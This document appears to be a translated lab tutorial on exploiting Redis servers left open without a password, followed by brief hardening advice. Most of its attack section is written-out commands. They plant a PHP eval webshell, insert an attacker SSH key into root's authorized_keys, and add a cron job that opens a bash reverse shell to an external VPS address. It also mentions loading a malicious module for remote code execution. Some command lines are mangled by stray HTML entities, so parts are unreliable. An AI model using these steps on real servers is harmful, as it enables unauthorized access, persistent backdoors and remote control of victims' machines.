Summary of redis unauthorized access utilization

Notes on environment construction:

Modify the redis.conf configuration file

daemoize yes

Open port 6379 of iptables firewall

 iptables -I INPUT 1 -p tcp -m state --state NEW -m tcp --dport 6379 -j ACCEPT

install redis-cli in linux system

tar -zxf redis-stable.tar.gz
cd redis-stable
make # compile
cp ./src/redis-cli /usr/bin/ #similar to environment variable /usr/local/bin

The difference between /usr/bin/ and /usr/local/bin

usr refers to Unix System Resource

/usr/bin Some executable programs pre-installed in the system, which will change with system upgrades

/usr/local/bin Executable programs installed by users are not affected by system upgrades. When users compile and install software, they are generally placed in the /usr/loca/bin directory

Priority: /usr/local/bin > /usr/bin

Redis basic command:

info #View redis information and server information
flushall deletes all data
del key Delete the data whose key is key
get key Get the data of the parameter key

Use WIndows platform tools to connect redis

  1. telnet connection

telnet 6379

  1. RedisDesktopManager client direct connection


Redis is an open source NoSQL database written in C.

Redis runs based on memory and supports persistence. It adopts key-value (key-value pair) storage form, which is an indispensable part of the current distributed architecture.

Usage principle:

File writing using redis

Vulnerability exploit conditions

1. Redis is bound to, and no firewall rules have been added to prevent other untrusted sources of IP access and other related security policies. If it is directly exposed to the public network, the Redis service will be directly exposed to the public network, which may cause other problems. Users can directly access Redis services and perform related operations without authorization. The current mainstream cases: the yam2 minerd mining program, and a large number of watch-smartd mining Trojans found in multiple emergency incidents.

2. If no password authentication is set (usually empty), you can remotely log in to the redis service without a password.

How to use

CNVD-2019-21763 recurrence

Background: Due to the new module function in Reids 4.x and above, attackers can implement a new Redis command in Redis through external expansion. Attackers can use this function to introduce modules to make the attacked server load malicious .so files without authorized access, thereby achieving remote code execution.

The connection is normal here, but the execution time of the command is timed out, which should be a shooting range problem

Use redis to write webshell

Obtain the absolute path of the website through phpinfo or error page

config set: quickly modify the redis configuration.

dbfilename : Set the file name of the snapshot, the default is dump.rdb

dir: default redis file save path

Know the website path, then you can set dir to a directory a, and dbfilename to file name b, and then execute save or bgsave, then we can write an arbitrary file with path a/b.

The command is as follows

config set dir /var/www/html/
config set dbfilename shell.php
set x "\r\\
<?php eval($_POST[cmd]);?>\r\\

means newline, and the file written by redis will have some version information.

Successfully found the corresponding file in the corresponding folder

Write the ssh-keygen public key and log in with the private key

The .ssh directory exists on the server and has write permission.

The principle is to insert a piece of data in the database, use the local public key as the value, the key value is arbitrary, and then save the buffered data in the file, so that an authorized key can be generated under /root/.ssh on the server side.

The command is as follows:

Generated under kali

ssh-keygen -t rsa

The public and private keys are generated under the /root/.ssh/id_rsa folder

(echo -e "\\
"; cat; echo -e "\\
") > key.txt
cat /root/.ssh/key.txt | redis-cli -h -x set xxx

Use the attacking machine to connect to the target machine Redis, set the backup path of Redis to /root/.ssh/ and save the file named authorized_keys, and save the data on the hard disk of the target server.

redis-cli -h -p 6379
config set dir /root/.ssh
config set dbfilename authorized_keys

Transfer the public key under the corresponding path of the victim machine

ssh connects to the target machine successfully

Redis write scheduled task

Insert a pair of key values (value, key) into the database, modify the default path of the database and set it as the path of the target host scheduled task, and save the buffered data in the file, so that a scheduled task can be successfully written on the server side for execution Rebound shell.

# Rebound shell to port 7777 of vps
set xxx "\\
*/1 * * * * /bin/bash -i> & amp;/dev/tcp/47.94.xx.xx/7777 0> & amp;1\\
\ n"
config set dir /var/spool/cron/crontabs/ #Here is the location of ubuntu timing tasks centos is /var/spool/cron/
config set dbfilename root

This method can only be used on Centos, and it will not work on Ubuntu for the following reasons:

Because the default redis write file is 644 permission, but ubuntu requires the execution of the scheduled task file /var/spool/cron/crontabs/ permission must be 600, which is -rw——- to be executed, otherwise an error will be reported ( root) INSECURE MODE (mode 0600 expected), and the Centos scheduled task file /var/spool/cron/permission 644 can also be executed

Common errors

  1. Errors that may occur when setting config set dir /var/spool/cron/crontabs/:

The root user has never logged in. If it is a target machine practice, execute ssh localhost on the target machine to set

  1. (error) ERR Changing directory: Permission denied

Indicates that redis is not started as root

The difference between /var/spool/cron/ and /etc/crontab

/var/spool/cron/ This directory stores the crontab tasks of each user including root. Each task is named after the creator. For example, the file corresponding to the crontab task created by tom is /var/spool/cron/tom . Generally, a user has at most one crontab file

/etc/crontab This file is responsible for arranging the crontab for maintaining the system and other tasks formulated by the system administrator

How to use redis on windows?

  1. If you can get the absolute path of the web, write it directly to the webshell

Change the website directory under linux and write in webshell

  1. Write startup items

The directory of the startup item under windows is

C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

(You also need to know the user name of the other party, the default is administrator)

to be continued

  1. Write mof, dll hijacking, etc.

to be continued

Reference: Summary of Redis Unauthorized Exploitation Methods in Windows Environment – FreeBuf Network Security Industry Portal

Unauthorized access to Redis under Windows – Anquanke – Security Information Platform (

Redis Unauthorized Access Defense Method

In the redis installation directory, correctly configure the redis.conf file

  • By default, bind is only open to the local

  • Add login password: modify redis.conf file, add requirepass password

  • Modify the default port when it needs to be opened to the outside world (the port is not repeated) port 2333

  • Cooperate with iptables to restrict opening

  • Power reduction: run the Redis service with low privileges (restart redis to take effect)

  • It is forbidden to start the redis service with root privileges